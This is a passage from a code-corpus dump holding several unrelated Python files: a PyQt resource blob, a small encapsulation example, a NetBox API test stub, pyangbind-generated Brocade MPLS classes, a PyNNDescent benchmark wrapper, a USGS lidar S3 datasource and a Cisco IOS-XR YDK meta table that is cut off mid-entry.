0\\x00\\x00\\x01\\x00\\x01\\x94\\xba\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf2\\\n\\x00\\x00\\x10t\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb1\\xfe\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xeb\\\n\\x00\\x00\\x0d\\x8c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x9f\\x1b\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xee\\\n\\x00\\x00\\x04X\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01e\\x94\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf6\\\n\\x00\\x00\\x04&\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01d?\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf8\\\n\\x00\\x00\\x05\\xf0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01qg\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xeb\\\n\\x00\\x00\\x0a~\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x8eA\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf4\\\n\\x00\\x00\\x06\\xe6\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01w\\x0a\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd9\\\n\\x00\\x00\\x10\\x1e\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xaf?\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe0\\\n\\x00\\x00\\x10\\xa6\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb3\\xc9\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xdc\\\n\\x00\\x00\\x04\\xf8\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01k\\xfc\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe3\\\n\\x00\\x00\\x03x\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01`\\xbb\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xdc\\\n\\x00\\x00\\x07*\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01xr\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xda\\\n\\x00\\x00\\x08L\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x7f\\x85\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe9\\\n\\x00\\x00\\x0f@\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xab\\x5c\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd8\\\n\\x00\\x00\\x08\\x92\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x81U\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe7\\\n\\x00\\x00\\x08\\xe4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x83\\xf1\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf7\\\n\\x00\\x00\\x0b\\xf6\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x95\\xe8\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf3\\\n\\x00\\x00\\x05\\x84\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01nY\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe8\\\n\\x00\\x00\\x08\\x1c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01}\\xf8\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xdf\\\n\\x00\\x00\\x04\\xb8\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01i`\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe7\\\n\\x00\\x00\\x0c\\xd4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x99\\xc6\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xed\\\n\\x00\\x00\\x09x\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x88I\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe2\\\n\\x00\\x00\\x09X\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x86\\x0c\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf1\\\n\\x00\\x00\\x0dV\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x9d\\xbd\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf1\\\n\\x00\\x00\\x05<\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01l\\xfb\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf2\\\n\\x00\\x00\\x0b\\x82\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x93_\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xed\\\n\\x00\\x00\\x05\\xce\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01p\\x1f\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xdd\\\n\\x00\\x00\\x10\\xea\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb7i\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe5\\\n\\x00\\x00\\x09\\xac\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x89\\xfb\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe8\\\n\\x00\\x00\\x0e\\xba\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa6\\x8a\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf9\\\n\\x00\\x00\\x0b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x90\\x8f\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd3\\\n\\x00\\x00\\x0a:\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x8d%\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf7\\\n\\x00\\x00\\x0f\\x84\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xacl\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xee\\\n\\x00\\x00\\x0e\\x16\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa2\\x0f\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe4\\\n\\x00\\x00\\x06\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01u:\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xea\\\n\\x00\\x00\\x10\\xca\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb5\\xcb\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf6\\\n\\x00\\x00\\x0d\\xbe\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa0\\xcf\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xdf\\\n\\x00\\x00\\x11\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xba\\x05\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd9\\\n\\x00\\x00\\x07Z\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01y\\xd7\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xde\\\n\\x00\\x00\\x0bD\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x91\\xf7\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd4\\\n\\x00\\x00\\x0eP\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa3\\xb3\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xdd\\\n\\x00\\x00\\x0c\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x98{\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe0\\\n\\x00\\x00\\x0d\\x14\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x9b!\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe6\\\n\\x00\\x00\\x0e\\xfe\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa7\\xdf\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe1\\\n\\x00\\x00\\x0a\\xd0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x8f\\x7f\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd6\\\n\\x00\\x00\\x07\\xe0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01|_\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xde\\\n\\x00\\x00\\x03\\xbe\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01b\\x1f\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd6\\\n\\x00\\x00\\x06L\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01t\\x1b\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf4\\\n\\x00\\x00\\x0f \\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa9\\x91\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xea\\\n\\x00\\x00\\x06\\x1e\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01r\\xaf\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf0\\\n\\x00\\x00\\x07\\xa0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01{\\x17\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xec\\\n\\x00\\x00\\x03\\xf0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01c/\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd5\\\n\\x00\\x00\\x04\\x86\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01ha\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe2\\\n\\x00\\x00\\x10P\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb0\\x8a\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe4\\\n\\x00\\x00\\x0cN\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x97\\x16\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xda\\\n\\x00\\x00\\x09\\x16\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x85\\x0d\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe3\\\n\\x00\\x00\\x0f\\xc8\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xae \\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf5\\\n\\x00\\x00\\x02\\xcc\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01P7\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb1\\\n\\x00\\x00\\x02|\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x1a9\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb4\\\n\\x00\\x00\\x02`\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x15\\xd8\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb2\\\n\\x00\\x00\\x03\\x0a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01R$\\\n\\x00\\x00\\x01|z\\x1a\\x99\\xb6\\\n\\x00\\x00\\x01\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x0c\\x99\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb3\\\n\\x00\\x00\\x02\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x14\\xb3\\\n\\x00\\x00\\x01|x\\xc9R\\x9c\\\n\\x00\\x00\\x01\\xcc\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x0eT\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb5\\\n\\x00\\x00\\x03N\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01_+\\\n\\x00\\x00\\x01|x\\xc8\\xac\\x18\\\n\\x00\\x00\\x02\\xae\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x01\\x1cA\\\n\\x00\\x00\\x01|\\x92\\x17g\\xae\\\n\\x00\\x00\\x01\\xea\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x12\\xf9\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb6\\\n\\x00\\x00\\x01\\x16\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00>\\x17\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb7\\\n\\x00\\x00\\x018\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xd0\\xdd\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb7\\\n\"\n\ndef qInitResources():\n QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n"} {"ext": "py", "sha": "1a2f3cea35bbeab0fac5b0a6fd23d61f79be9b2c", "content": "class Encapsulada:\n\n atributo_visible = 'soy visible'\n _atributo_protegido = 'soy protegido'\n __atributo_privado = 'soy un atributo privado'\n\n def get_atributo_privado(self):\n return self.__atributo_privado\n\n def set_atributo_privado(self, cambio):\n self.__atributo_privado = cambio\n"} {"ext": "py", "sha": "1a2f3edc14828893e52f591f241c6f4d3c54fce3", "content": "# coding: utf-8\n\n\"\"\"\n NetBox API\n\n API to access NetBox # noqa: E501\n\n OpenAPI spec version: 2.8\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport netbox_client\nfrom netbox_client.models.writable_front_port import WritableFrontPort # noqa: E501\nfrom netbox_client.rest import ApiException\n\n\nclass TestWritableFrontPort(unittest.TestCase):\n \"\"\"WritableFrontPort unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testWritableFrontPort(self):\n \"\"\"Test WritableFrontPort\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = netbox_client.models.writable_front_port.WritableFrontPort() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f3fdd43f2a1b0b52665cf073448048e5e40fb", "content": "\nfrom operator import attrgetter\nimport pyangbind.lib.xpathhelper as xpathhelper\nfrom pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType\nfrom pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType\nfrom pyangbind.lib.base import PybindBase\nfrom decimal import Decimal\nfrom bitarray import bitarray\nimport __builtin__\nclass lsp_admin_group_include_all(PybindBase):\n \"\"\"\n This class was auto-generated by the PythonClass plugin for PYANG\n from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/show-mpls-lsp-debug/output/lsp/show-mpls-lsp-debug-info/show-mpls-lsp-common-info/lsp-config-frr-admin-groups/lsp-admin-group/lsp-admin-group-include-all. Each member element of\n the container is represented as a class variable - with a specific\n YANG type.\n \"\"\"\n __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp_admin_group_include_all_group_id',)\n\n _yang_name = 'lsp-admin-group-include-all'\n _rest_name = 'lsp-admin-group-include-all'\n\n _pybind_generated_by = 'container'\n\n def __init__(self, *args, **kwargs):\n\n path_helper_ = kwargs.pop(\"path_helper\", None)\n if path_helper_ is False:\n self._path_helper = False\n elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):\n self._path_helper = path_helper_\n elif hasattr(self, \"_parent\"):\n path_helper_ = getattr(self._parent, \"_path_helper\", False)\n self._path_helper = path_helper_\n else:\n self._path_helper = False\n\n extmethods = kwargs.pop(\"extmethods\", None)\n if extmethods is False:\n self._extmethods = False\n elif extmethods is not None and isinstance(extmethods, dict):\n self._extmethods = extmethods\n elif hasattr(self, \"_parent\"):\n extmethods = getattr(self._parent, \"_extmethods\", None)\n self._extmethods = extmethods\n else:\n self._extmethods = False\n self.__lsp_admin_group_include_all_group_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"lsp-admin-group-include-all-group-id\", rest_name=\"lsp-admin-group-include-all-group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\n\n load = kwargs.pop(\"load\", None)\n if args:\n if len(args) > 1:\n raise TypeError(\"cannot create a YANG container with >1 argument\")\n all_attr = True\n for e in self._pyangbind_elements:\n if not hasattr(args[0], e):\n all_attr = False\n break\n if not all_attr:\n raise ValueError(\"Supplied object did not have the correct attributes\")\n for e in self._pyangbind_elements:\n nobj = getattr(args[0], e)\n if nobj._changed() is False:\n continue\n setmethod = getattr(self, \"_set_%s\" % e)\n if load is None:\n setmethod(getattr(args[0], e))\n else:\n setmethod(getattr(args[0], e), load=load)\n\n def _path(self):\n if hasattr(self, \"_parent\"):\n return self._parent._path()+[self._yang_name]\n else:\n return [u'brocade_mpls_rpc', u'show-mpls-lsp-debug', u'output', u'lsp', u'show-mpls-lsp-debug-info', u'show-mpls-lsp-common-info', u'lsp-config-frr-admin-groups', u'lsp-admin-group', u'lsp-admin-group-include-all']\n\n def _rest_path(self):\n if hasattr(self, \"_parent\"):\n if self._rest_name:\n return self._parent._rest_path()+[self._rest_name]\n else:\n return self._parent._rest_path()\n else:\n return [u'show-mpls-lsp-debug', u'output', u'lsp', u'lsp-config-frr-admin-groups', u'lsp-admin-group-include-all']\n\n def _get_lsp_admin_group_include_all_group_id(self):\n \"\"\"\n Getter method for lsp_admin_group_include_all_group_id, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_debug/output/lsp/show_mpls_lsp_debug_info/show_mpls_lsp_common_info/lsp_config_frr_admin_groups/lsp_admin_group/lsp_admin_group_include_all/lsp_admin_group_include_all_group_id (uint32)\n\n YANG Description: Include all admin group id\n \"\"\"\n return self.__lsp_admin_group_include_all_group_id\n \n def _set_lsp_admin_group_include_all_group_id(self, v, load=False):\n \"\"\"\n Setter method for lsp_admin_group_include_all_group_id, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_debug/output/lsp/show_mpls_lsp_debug_info/show_mpls_lsp_common_info/lsp_config_frr_admin_groups/lsp_admin_group/lsp_admin_group_include_all/lsp_admin_group_include_all_group_id (uint32)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_lsp_admin_group_include_all_group_id is considered as a private\n method. Backends looking to populate this variable should\n do so via calling thisObj._set_lsp_admin_group_include_all_group_id() directly.\n\n YANG Description: Include all admin group id\n \"\"\"\n parent = getattr(self, \"_parent\", None)\n if parent is not None and load is False:\n raise AttributeError(\"Cannot set keys directly when\" +\n \" within an instantiated list\")\n\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"lsp-admin-group-include-all-group-id\", rest_name=\"lsp-admin-group-include-all-group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"lsp_admin_group_include_all_group_id must be of a type compatible with uint32\"\"\",\n 'defined-type': \"uint32\",\n 'generated-type': \"\"\"YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"lsp-admin-group-include-all-group-id\", rest_name=\"lsp-admin-group-include-all-group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\"\"\",\n })\n\n self.__lsp_admin_group_include_all_group_id = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_lsp_admin_group_include_all_group_id(self):\n self.__lsp_admin_group_include_all_group_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"lsp-admin-group-include-all-group-id\", rest_name=\"lsp-admin-group-include-all-group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\n\n lsp_admin_group_include_all_group_id = __builtin__.property(_get_lsp_admin_group_include_all_group_id, _set_lsp_admin_group_include_all_group_id)\n\n\n _pyangbind_elements = {'lsp_admin_group_include_all_group_id': lsp_admin_group_include_all_group_id, }\n\n\n"} {"ext": "py", "sha": "1a2f40bea97426641a515b43d3e4286b9d5483b1", "content": "from __future__ import absolute_import\nimport pynndescent\nfrom ann_benchmarks.algorithms.base import BaseANN\n\nclass PyNNDescent(BaseANN):\n def __init__(self, metric, n_neighbors=10, n_trees=8, leaf_size=20):\n self._n_neighbors = int(n_neighbors)\n self._n_trees = int(n_trees)\n self._leaf_size = int(leaf_size)\n self._queue_size=None\n self._pynnd_metric = {'angular': 'cosine',\n 'euclidean': 'euclidean',\n 'hamming': 'hamming',\n 'jaccard': 'jaccard'}[metric]\n\n def fit(self, X):\n self._index = pynndescent.NNDescent(X,\n n_neighbors=self._n_neighbors,\n n_trees=self._n_trees,\n leaf_size=self._leaf_size,\n metric=self._pynnd_metric)\n\n def set_query_arguments(self, queue_size):\n self._queue_size = float(queue_size)\n\n\n def query(self, v, n):\n ind, dist = self._index.query(v.reshape(1, -1).astype('float32'), k=n, queue_size=self._queue_size)\n return ind[0]\n\n def use_threads(self):\n return False\n\n def __str__(self):\n return 'PyNNDescent(n_neighbors=%d, n_trees=%d, leaf_size=%d, queue_size=%.2f)' % (self._n_neighbors,\n self._n_trees,\n self._leaf_size,\n self._queue_size)"} {"ext": "py", "sha": "1a2f410f822d032450aa752eb50cb91c79df1f19", "content": "import os\nimport json\nimport uuid\n\nimport boto3\n\n\nfrom datasources.stac.query import STACQuery\nfrom datasources.sources.base import Datasource\n\nclient = boto3.client('s3')\nbucket = 'usgs-lidar-public'\n\nclass USGS3DEP(Datasource):\n\n stac_compliant = False\n tags = ['Elevation', 'Raster']\n\n def __init__(self, manifest):\n super().__init__(manifest)\n\n def search(self, spatial, temporal=None, properties=None, limit=10, **kwargs):\n from db import Database\n\n names = []\n stac_query = STACQuery(spatial, temporal, properties)\n # projects = stac_query.check_spatial(self.__class__.__name__)[:limit]\n\n with Database.load(read_only=True, deployed=True) as db:\n projects = db.spatial_query({\"type\": \"Feature\", \"geometry\": stac_query.spatial})\n\n searches = 0\n for item in projects:\n if item['name'] not in names:\n if temporal and item['year']:\n if stac_query.temporal[0].year != item['year'] or stac_query.temporal[1].year != item['year']:\n continue\n\n if properties:\n item.update({'properties': stac_query})\n\n if searches < limit:\n self.manifest.searches.append([self, item])\n searches+=1\n\n\n\n # searches = 0\n # for item in projects:\n # if item['name'] not in names:\n # # Temporal check by checking year of start/end date\n # if temporal and item['year']:\n # if stac_query.temporal[0].year == item['year'] or stac_query.temporal[1].year == item['year']:\n # if properties:\n # item.update({'properties': stac_query})\n # self.manifest.searches.append([self, item])\n # names.append(item['name'])\n # else:\n # self.manifest.searches.append([self, item])\n # names.append(item['name'])\n\n def execute(self, query):\n # Download metadata from query item\n response = client.get_object(Bucket=bucket, Key=os.path.join(query['name'], 'ept.json'))\n metadata = json.loads(response['Body'].read().decode('utf-8'))\n\n xvals = [x[0] for x in query['geometry']['coordinates'][0]]\n yvals = [y[1] for y in query['geometry']['coordinates'][0]]\n\n\n stac_item = {\n 'id': str(uuid.uuid4()),\n 'type': 'Feature',\n 'bbox': [min(xvals), min(yvals), max(xvals), max(yvals)],\n 'geometry': query['geometry'],\n 'properties': {\n 'datetime': f\"{query['year']}-01-01T00:00:00.00Z\",\n 'eo:epsg': metadata['srs']['horizontal'],\n 'pc:count': metadata['points'],\n 'pc:type': 'lidar',\n 'pc:encoding': metadata['dataType'],\n 'pc:schema': metadata['schema'],\n 'legacy:span': metadata['span'],\n 'legacy:version': metadata['version'],\n },\n 'assets': {\n 's3path': {\n 'href': f\"s3://{bucket}/{query['name']}\",\n 'title': 'EPT data'\n }\n },\n }\n\n if \"properties\" in list(query):\n if query['properties'].check_properties(stac_item['properties']):\n return [stac_item]\n else:\n return [stac_item]"} {"ext": "py", "sha": "1a2f42594b5ecd2ed04908d58cdc7e79376638b5", "content": "\n\n\nimport re\nimport collections\n\nfrom enum import Enum\n\nfrom ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum\nfrom ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict\nfrom ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION\n\nfrom ydk.errors import YPYError, YPYModelError\nfrom ydk.providers._importer import _yang_ns\n\n_meta_table = {\n 'HistRecordEnum' : _MetaInfoEnum('HistRecordEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper',\n {\n 'cfghist-bag-record-all':'cfghist_bag_record_all',\n 'cfghist-bag-record-alarm':'cfghist_bag_record_alarm',\n 'cfghist-bag-record-cfs-check':'cfghist_bag_record_cfs_check',\n 'cfghist-bag-record-commit':'cfghist_bag_record_commit',\n 'cfghist-bag-record-oir':'cfghist_bag_record_oir',\n 'cfghist-bag-record-shutdown':'cfghist_bag_record_shutdown',\n 'cfghist-bag-record-startup':'cfghist_bag_record_startup',\n 'cfghist-bag-record-backup':'cfghist_bag_record_backup',\n 'cfghist-bag-record-rebase':'cfghist_bag_record_rebase',\n 'cfghist-bag-record-last':'cfghist_bag_record_last',\n }, 'Cisco-IOS-XR-config-cfgmgr-exec-oper', _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper']),\n 'CfgHistGl.RecordType.Record.Info.AlarmInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.AlarmInfo',\n False, \n [\n _MetaInfoClassMember('state', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' State\n ''',\n 'state',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('where', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Where\n ''',\n 'where',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'alarm-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.CfscheckInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.CfscheckInfo',\n False, \n [\n _MetaInfoClassMember('line', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Line\n ''',\n 'line',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('user-id', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' UserId\n ''',\n 'user_id',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'cfscheck-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.CommitInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.CommitInfo',\n False, \n [\n _MetaInfoClassMember('client-name', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Client name\n ''',\n 'client_name',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('comment', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Comment\n ''',\n 'comment',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('commit-id', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' CommitId\n ''',\n 'commit_id',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('label', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Label\n ''',\n 'label',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('line', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Line\n ''',\n 'line',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('user-id', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' UserId\n ''',\n 'user_id',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'commit-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.OirInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.OirInfo',\n False, \n [\n _MetaInfoClassMember('config-name', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Config Name\n ''',\n 'config_name',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('config-type', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Config Type\n 